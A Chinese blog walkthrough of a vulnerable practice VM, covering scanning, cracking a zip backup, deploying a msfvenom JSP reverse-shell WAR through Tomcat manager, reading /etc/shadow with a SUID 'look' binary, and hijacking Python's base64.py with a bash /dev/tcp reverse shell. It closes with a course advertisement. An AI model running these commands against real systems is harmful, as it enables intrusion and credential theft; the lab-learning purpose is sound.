)
🍬 博主介绍
👨🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!
文章目录
- 🍬 博主介绍
- 一、靶场搭建
- 1. 靶场描述
- 2. 下载靶机环境
- 3. 启动靶机环境
- 二、 渗透靶场
- 1. 确认靶机
- 2. 探测主机开放端口及对应服务
- 3.探测网站目录结构
- 4. 敏感信息获取
- 5. 获取反弹shell
- 6. 权限提升
- 相关资源
一、靶场搭建
1. 靶场描述
Difficulty: Medium Hint: Enumeration is key.在描述提示了这个靶场中枚举是关键。
2. 下载靶机环境
靶场源地址点击跳转,点击图中标注处下载靶场源文件。
下载完成的文件如下:
一般从网上下载的文件,可以使用检验下载文件的检验码,防止下载的文件被篡改或者部分缺失.
# windwos 命令 Get-FileHash <filePath> -Algorithm MD5 # linux md5sum filepath3. 启动靶机环境
下载下来是虚拟机压缩文件,直接用Vmvare导入就行。然后调一下网络,建议调成NAT模式,桥接其实也行。具体操作步骤可以看我之前的文章,这里就不要进行详细介绍了。搭建完成之后显示如下。
二、 渗透靶场
1. 确认靶机
确定靶机的步骤:
- 通过nmap进行靶机目标网段(192.168.37.22/24)的存活主机探测。
- nmap显示出存活主机之后,根据nmap显示的存活主机的主机名结合已知设备ip排除确定靶机。如果靶机环境设置为
nat模式确定靶机ip会比较容易。
nmap -sn 192.168.37.22/24排除到已知ip的机器之后,确认靶机的的ip为
192.168.37.131。
2. 探测主机开放端口及对应服务
探测端口开放和对应开放端口服务识别,一般使用nmap进行,因为nmap指纹识别比较准确,并且指纹库也比较全。
# ip 指定为靶机ip nmap -Ap 1-65535 192.168.37.131确定靶机开放了22、80、8080端口,对应为ssh远程服务和两个web服务,分别打开对应web界面。
3.探测网站目录结构
按照靶机作者枚举的提示,本次使用
dirsearch工具进行扫描两个web服务,使用默认字典的进行爆破。
# 扫描8080端口 -x排除404 sudo dirsearch -u http://192.168.37.131:8080 -x 404 # 扫描80端口 sudo dirsearch -u http://192.168.37.131 -x 40480端口的web服务没有扫出什么东西,8080的服务,扫出了
backup.zip和readme.txt和manager等目录。一一查看这些信息,是文件就下载下来。
readme中说明了系统管理员提供了一些有用的文件,并且应该被加密了。
4. 敏感信息获取
下载
backup.zip文件之后,发现这个zip文件是被加密,推测这个文件就是readme.txt中说到的文件。尝试使用fcrackzip利用字典进行破解,成功破解出密码,获取出密码之后,解压zip文件。
# 强制进行破解, -p指定字典 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip# -d指定解压放入的目录 unzip backup.zip -d back发现里面存放的tomcat-users.xml文件记录的系统tomcat的manager管理员账户密码。
5. 获取反弹shell
用压缩包中记录的账号密码登录,网站的manager控制后台,发现可以部署直接在线部署war包,可以利用这个点进行shell反弹。
接下来使用msfveonm工机具构建恶意jsp war文件来进行反弹shell。
# LHOST 为你的攻击机ip LPORT为监听反弹shell的端口 sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.37.22" LPORT=8888 -f war > jsp_java.war构建完成之后,上传war包进行利用。
# 攻击机监听反向shell连接 nc -lvp 8888点击箭头处访问对应连接就能获取到反弹shell了,成功获取到shell。
6. 权限提升
GetShell之后,通过一段python代码创建要给交互式终端。
python3 -c 'import pty; pty.spawn("/bin/bash")'拿到shell之后,接下来一般就是提权,一般显示先尝试一些常见提权方式进行(suid、 sudo、定时任务等)。在尝试这些常见的提取那方式发现不能进行提权。一般遇到这种情况,开始在系统中找寻一些敏感信息,比如找寻到用户的备份信息,用户家目录下的信息等等,看看是不是有可利用的信息。
# 查询具备suid标志的文件 find / -perm -u=s -type f 2>>/dev/null # 查询当前用户是否有可利用sudo提权的命令 sudo -l # 查看备份文件 find / -name "*backup*" 2>>/dev/null在用户的家目录下知道系统存在两个普通用户,尝试使用之前
tomcat-users.xml中的密码进行尝试登录(多个账户设置成一个密码是常见的),成功登录jaye用户。
知道jaye用户的命令之后,通过ssh方式进行连接。
执行查找具备SUID标志的文件,发现一个
look程序被设置了suid,并且这个文件的创建者是root用户,这意味着可以读取任何内容。
简单介绍一个look命令,
look命令是一个用于在 Unix 和类 Unix 系统中查找单词的工具。它的主要功能是根据给定的前缀从字典文件中查找匹配的单词。
look [选项] 前缀 [字典文件] 常用选项: `-f`:忽略大小写。 `-b`:只显示以该前缀开头的单词。 `-d`:只查找字典文件中存在的单词。 `-n`:只显示字母数字字符的单词。接下来通过look命令读取
/etc/passwd和/etc/shadow,传递到本地,通过john进行密码破解。
./look "" /etc/passwd > ./passwd.txt ./look "" /etc/shadow > ./shadow.txt # 开启服务 python3 -m http.server 9090# 攻击者执行 wget http://192.168.37.131:9090/shadow.txt wget http://192.168.37.131:9090/passwd.txt进行密码破解john有支持两种方式.,
hash,user:hash,接下来通过unshadow将/etc/passwd和/etc/shadow处理成符合john支持的格式,之后就进行暴力爆破了。等待时间非常长。
# 处理格式 unshadow ./passwd.txt ./shadow.txt >> unshadowed.txt # 进行破解 sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./unshadow.txt # 查看破解结果 john --show ./unshadow.txtjohn暴力之后,成功获取到randy用户的密码,接下来通过ssh进行登录。执行sudo查看是否有可利用的方式,发现可以使用python3.8执行一个脚本免密以root身份执行。
先查看一下这个脚本的内容,并且查看这个脚本的权限,看登录用户是不是可以编辑,发现不能编辑,但是这个脚本引入了一个模块,接下来查看是否可以修改对应依赖的代码,这样就能注入恶意代码了。
# 查询依赖模块源文件的位置 find / -name "base64.py" 2>>/dev/null # 查看权限 ls -l /usr/lib/python3.8/base64.py发现可以修改对应的python代码,接下来通过在base64.py中注入恶意代码实现反弹shell。
# 恶意代码 import subprocess # 设置目标主机和端口 SERVER_IP = '192.168.37.22' # 替换为你的目标主机IP SERVER_PORT = '8888' # 替换为你的目标端口 # 使用 Bash 反弹 shell subprocess.run(f'bash -c "bash -i >& /dev/tcp/{SERVER_IP}/{SERVER_PORT} 0>&1"', shell=True)# kali监听 nc -lvp 8888成功获取到root权限和对应flag。
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
